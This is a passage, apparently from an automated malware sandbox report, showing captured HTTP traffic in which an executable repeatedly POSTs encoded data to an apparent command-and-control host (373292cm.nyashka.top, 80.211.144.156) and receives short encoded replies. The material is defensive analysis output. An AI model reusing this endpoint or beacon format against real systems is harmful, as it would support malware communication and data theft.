                                                                    Data Ascii: ZQ\UTFT][_ZQYWXWW_]XWYS_YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.\;3@5$ 0">??>:<;]7<'P#!(+X"0=X.>&F$.Y/=
                                                                    Aug 21, 2024 10:03:49.245367050 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:49.441786051 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    43192.168.2.75299980.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:49.569741011 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:49.927572966 CEST2544OUTData Raw: 5f 50 5c 52 51 43 51 5b 5b 5f 5a 51 59 56 58 52 57 5c 5d 52 57 58 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _P\RQCQ[[_ZQYVXRW\]RWXSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.\8/5?4)[3?X%<.( <4<3 3*;.&F$.Y/!
                                                                    Aug 21, 2024 10:03:50.271882057 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:50.472187996 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    44192.168.2.75300080.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:50.612498999 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:50.959260941 CEST2544OUTData Raw: 5a 56 5c 50 51 44 54 5f 5b 5f 5a 51 59 55 58 5f 57 59 5d 5d 57 51 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZV\PQDT_[_ZQYUX_WY]]WQS^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/3 6= 4%=?+>![+ #Q!20S+'#]/&F$.Y/-


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    45192.168.2.75300180.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:51.249356985 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:51.607840061 CEST1868OUTData Raw: 5a 51 59 53 54 49 54 58 5b 5f 5a 51 59 5e 58 57 57 5f 5d 5a 57 59 53 5b 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZQYSTITX[_ZQY^XWW_]ZWYS[YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.;<5_4=*$<-)^((7?7S!!0+_<4V%8>&F$.Y/
                                                                    Aug 21, 2024 10:03:51.911799908 CEST1236OUTData Raw: 5a 51 59 53 54 49 54 58 5b 5f 5a 51 59 5e 58 57 57 5f 5d 5a 57 59 53 5b 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZQYSTITX[_ZQY^XWW_]ZWYS[YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.;<5_4=*$<-)^((7?7S!!0+_<4V%8>&F$.Y/
                                                                    Aug 21, 2024 10:03:51.978138924 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:51.979155064 CEST632OUTData Raw: 3e 03 34 32 0c 2d 01 09 33 01 1a 22 0f 23 3e 19 35 00 21 29 34 5d 1d 59 3e 01 27 5f 2b 20 14 25 3c 08 16 07 24 34 02 05 37 0f 0d 3c 09 09 2a 1c 32 1f 3d 02 39 5f 05 1b 39 30 13 0d 01 02 5f 19 06 2c 59 23 0b 01 08 03 3b 5a 3b 22 33 5e 2d 1f 35 32
                                                                    Data Ascii: >42-3"#>5!)4]Y>'_+ %<$47<*2=9_90_,Y#;Z;"3^-52!)36VZ$,4\Z??18/Z>=(24$Y_"88&08=208& %W>84&2X\(-*)6Z8$9\3Y".=;\3<70T&95>XT?$88?X:6(<<^3?:3(?)>,.X4<T.6V/-=72;>
                                                                    Aug 21, 2024 10:03:52.265796900 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 25 0f 29 25 32 10 25 15 0e 16 24 0d 22 56 2b 3d 2c 03 2a 04 2d 1a 25 2b 3a 05 25 2e 05 0d 24 2b 35 1f 3c 00 2d 0b 31 06 23 1e 2c 24 2b 5d 0c 13 22 5e 20 14 25 02 31 05 33 02 2a 06 02 05 20 3c 2a 59 2b 04 32 0a 28 11 38 1d 3f 07 2c 01 28 04 36 53 38 06 0f 16 2e 0e 2d 09 37 2e 2b 52 0d 11 24 56 2b 13 29 53 2a 3e 3b 17 22 28 23 5b 24 13 22 54 25 32 00 52 24 39 02 11 25 31 25 1c 27 31 2e 0c 26 3b 2a 58 25 01 3e 0f 22 18 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: %)%2%$"V+=,*-%+:%.$+5<-1#,$+]"^ %13* <*Y+2(8?,(6S8.-7.+R$V+)S*>;"(#[$"T%2R$9%1%'1.&;*X%>"#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    46192.168.2.75300280.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:51.372467041 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:51.741489887 CEST2544OUTData Raw: 5f 57 5c 51 54 47 51 5e 5b 5f 5a 51 59 52 58 5f 57 50 5d 5a 57 5b 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _W\QTGQ^[_ZQYRX_WP]ZW[STYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/0#D#> \ !>.+<-=?7]#0 20<<# */&F$.Y/1
                                                                    Aug 21, 2024 10:03:52.050192118 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:52.272365093 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    47192.168.2.75300380.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:52.433614016 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:52.786986113 CEST2544OUTData Raw: 5a 50 5c 56 51 47 54 58 5b 5f 5a 51 59 55 58 52 57 5f 5d 52 57 5e 53 5f 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZP\VQGTX[_ZQYUXRW_]RW^S_YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U._.0?A#.<#3:)?>5]+='Z4?0!1$P*)04!/>&F$.Y/-
                                                                    Aug 21, 2024 10:03:53.126692057 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:53.261482954 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    48192.168.2.75300480.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:53.382328033 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:53.739996910 CEST2544OUTData Raw: 5a 51 5c 55 54 41 54 5d 5b 5f 5a 51 59 53 58 57 57 5b 5d 5e 57 5e 53 5d 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZQ\UTAT][_ZQYSXWW[]^W^S]YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-.3"'40+-(<.\(+Z4Z3R!2 P?843>.>&F$.Y/5
                                                                    Aug 21, 2024 10:03:54.083780050 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:54.774826050 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    49192.168.2.75300580.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:54.898858070 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:55.255861998 CEST2544OUTData Raw: 5a 56 59 55 54 43 54 5b 5b 5f 5a 51 59 5e 58 56 57 5b 5d 52 57 59 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZVYUTCT[[_ZQY^XVW[]RWYS^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./+C"-' 6==+>Z)=7[#7W3+90#0";>&F$.Y/
                                                                    Aug 21, 2024 10:03:55.602005005 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:55.739381075 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    50192.168.2.75300680.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:55.867033958 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:56.224579096 CEST2544OUTData Raw: 5a 52 5c 51 51 47 54 5b 5b 5f 5a 51 59 5e 58 52 57 5e 5d 52 57 5d 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZR\QQGT[[_ZQY^XRW^]RW]SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-80<#-<^ 9Z=4X+==\?=+#!1$S<9"0)_,&F$.Y/
                                                                    Aug 21, 2024 10:03:56.549928904 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:56.687179089 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    51192.168.2.75300780.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:56.913096905 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:57.271532059 CEST2544OUTData Raw: 5f 54 59 52 51 44 51 5d 5b 5f 5a 51 59 5f 58 50 57 58 5d 58 57 59 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _TYRQDQ][_ZQY_XPWX]XWYSUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./#!. #0"+=4]+>6<(7'72#?$#V>,>&F$.Y/


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    52192.168.2.75300880.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:57.280612946 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:57.630922079 CEST1868OUTData Raw: 5f 52 59 53 54 40 51 5e 5b 5f 5a 51 59 5f 58 56 57 5f 5d 5e 57 51 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _RYST@Q^[_ZQY_XVW_]^WQS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.Y;/D6-#405])=\<![?=#<7!"'+*$7#&8&F$.Y/
                                                                    Aug 21, 2024 10:03:57.963222980 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:58.095185041 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 53 3d 1b 22 12 32 28 2c 19 27 33 2e 1e 2b 3d 09 5f 2b 2d 31 5f 24 38 25 1a 26 00 0d 08 27 5d 21 5c 28 3e 00 51 25 2f 0e 01 2d 24 2b 5d 0c 13 21 04 21 39 3a 5b 26 5a 30 59 3d 3b 2f 15 20 3c 0b 03 28 14 2d 16 3c 3f 3c 58 3f 2a 3f 58 28 2a 2a 57 3b 3b 2a 05 2f 30 0b 0e 37 2e 2b 52 0d 11 24 57 3f 03 29 1d 3d 2e 23 5e 35 06 2b 1d 26 3e 3a 55 31 0c 3a 57 30 07 24 1f 26 1c 3e 09 27 32 35 1d 32 3b 0c 5e 26 2f 0f 57 35 22 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &S="2(,'3.+=_+-1_$8%&']!\(>Q%/-$+]!!9:[&Z0Y=;/ <(-<?<X?*?X(**W;;*/07.+R$W?)=.#^5+&>:U1:W0$&>'252;^&/W5"#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    53192.168.2.75300980.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:57.398621082 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:57.755934000 CEST2544OUTData Raw: 5a 52 5c 57 51 45 54 5b 5b 5f 5a 51 59 55 58 54 57 5c 5d 5e 57 50 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZR\WQET[[_ZQYUXTW\]^WPSXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.X/U#B#=;7%Z><?8#<41 P+$4V68&F$.Y/-
                                                                    Aug 21, 2024 10:03:58.101869106 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:58.309056997 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    54192.168.2.75301080.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:58.428778887 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:58.787074089 CEST2544OUTData Raw: 5a 57 5c 53 51 43 54 5e 5b 5f 5a 51 59 51 58 5f 57 5d 5d 5f 57 5f 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZW\SQCT^[_ZQYQX_W]]_W_S^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./#?5(\ =<^?+.#[#<R 2#<8 0%..&F$.Y/=
                                                                    Aug 21, 2024 10:03:59.146661043 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:59.320493937 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    55192.168.2.75301180.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:59.592876911 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
